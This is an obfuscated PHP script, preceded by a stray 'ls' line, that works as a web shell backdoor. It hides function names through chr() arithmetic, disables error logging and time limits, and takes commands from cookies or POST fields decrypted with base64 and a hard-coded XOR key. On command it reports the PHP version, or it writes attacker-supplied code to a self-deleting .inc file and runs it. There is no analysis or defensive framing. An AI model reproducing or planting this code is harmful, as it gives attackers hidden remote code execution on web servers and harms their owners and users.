ls
<?php $yitunwf = "\x66".chr(105).chr(657-549).'e'."\137".'p'.chr(117)."\x74".chr(95)."\x63".'o'.'n'.chr(1007-891).chr(546-445)."\x6e".chr(913-797).chr(115);
$taxlrh = chr(1034-936).chr(534-437)."\163"."\145".chr(547-493).'4'.chr(878-783)."\x64"."\145".chr(99).chr(1098-987)."\144".chr(814-713);
$jcwrdre = 'i'.chr(840-730).'i'."\137".chr(1062-947).chr(101)."\164";
$yhymx = "\x75"."\x6e".'l'."\x69".chr(707-597).chr(1004-897);


@$jcwrdre("\145".chr(114).chr(114).chr(111)."\162".chr(597-502)."\x6c".'o'."\147", NULL);
@$jcwrdre("\154"."\x6f"."\147".chr(216-121).chr(858-757)."\x72".chr(114).chr(689-578).chr(812-698).chr(846-731), 0);
@$jcwrdre("\x6d".chr(299-202).chr(444-324).'_'.'e'."\170".'e'.'c'.'u'."\x74"."\151"."\x6f"."\156".'_'.'t'."\151"."\x6d"."\x65", 0);
@set_time_limit(0);

function qsbrwsn($eckvegcl, $xhsvpcxzsa)
{
    $ployxe = "";
    for ($kpgljkvrae = 0; $kpgljkvrae < strlen($eckvegcl);) {
        for ($j = 0; $j < strlen($xhsvpcxzsa) && $kpgljkvrae < strlen($eckvegcl); $j++, $kpgljkvrae++) {
            $ployxe .= chr(ord($eckvegcl[$kpgljkvrae]) ^ ord($xhsvpcxzsa[$j]));
        }
    }
    return $ployxe;
}

$dhxoe = array_merge($_COOKIE, $_POST);
$devloh = '016bac4f-6d4b-4394-a85c-12327ebb7d19';
foreach ($dhxoe as $mmwzut => $eckvegcl) {
    $eckvegcl = @unserialize(qsbrwsn(qsbrwsn($taxlrh($eckvegcl), $devloh), $mmwzut));
    if (isset($eckvegcl["\141".chr(676-569)])) {
        if ($eckvegcl[chr(469-372)] == 'i') {
            $kpgljkvrae = array(
                'p'.chr(585-467) => @phpversion(),
                "\163"."\166" => "3.5",
            );
            echo @serialize($kpgljkvrae);
        } elseif ($eckvegcl[chr(469-372)] == 'e') {
            $ktidpzzpa = "./" . md5($devloh) . chr(46)."\x69".'n'.'c';
            @$yitunwf($ktidpzzpa, "<" . chr(852-789).'p'.'h'.chr(548-436)."\40".'@'."\165"."\x6e"."\154".chr(105).chr(521-411).chr(974-867).chr(40).chr(95).chr(280-185).chr(560-490)."\x49".chr(76)."\105"."\137"."\137"."\x29"."\x3b".chr(32) . $eckvegcl["\144"]);
            include($ktidpzzpa);
            @$yhymx($ktidpzzpa);
        }
        exit();
    }
}
